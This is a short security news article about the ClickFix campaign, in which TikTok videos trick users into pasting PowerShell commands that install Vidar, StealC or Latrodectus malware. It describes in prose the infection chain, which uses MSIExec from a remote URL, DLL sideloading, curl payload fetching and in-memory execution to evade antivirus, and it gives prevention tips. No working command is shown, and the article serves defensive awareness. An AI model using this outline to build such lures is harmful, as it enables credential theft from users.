ClickFix Campaign on Social Media
ClickFix, a dangerous social engineering tactic, spreads malware through TikTok videos. These videos trick users into running harmful PowerShell commands. For example, they promise to activate software like Spotify or Microsoft Office. The campaign, active in May 2025, delivers Vidar and StealC malware.
How the Attack Works
The videos guide users to open the Windows Run dialog. They instruct users to press “Windows + R” and launch PowerShell. Then, users copy and execute a command shown in the video. Consequently, this command downloads and runs malware directly in memory.
Malware Payload and Execution
The executed command uses MSIExec to install a file from a remote URL. This file includes a legitimate NVIDIA app to sideload a malicious DLL. For instance, the DLL uses curl to fetch the main payload. This memory-based execution helps the malware avoid detection.
Targeting Pirated Software Users
Attackers target users seeking pirated apps or premium features. TikTok accounts posted these misleading videos. One video gained nearly 500,000 views before the account shut down. Therefore, the campaign exploits users’ trust in popular platforms.
Latrodectus and Other Malware
ClickFix also distributes Latrodectus, a downloader linked to IcedID developers. First seen in 2023, Latrodectus deploys additional payloads like ransomware. A report notes its use in email campaigns by threat actors. However, Operation Endgame disrupted its infrastructure in May 2025.
Why It’s Hard to Detect
The malware runs in memory, not on disk. This method bypasses traditional antivirus tools. For example, browsers and security software struggle to spot it. As a result, users remain unaware of the infection until it’s too late.
Preventing ClickFix Malware Attacks
To stop ClickFix, disable the Windows Run dialog via Group Policy. For example, turn off the “Windows + R” hotkey in the Registry. Use antivirus software to monitor for suspicious commands and avoid following unverified online tutorials. Additionally, verify software sources before installation. These steps help protect against malware and data theft.
Sleep well, we got you covered.
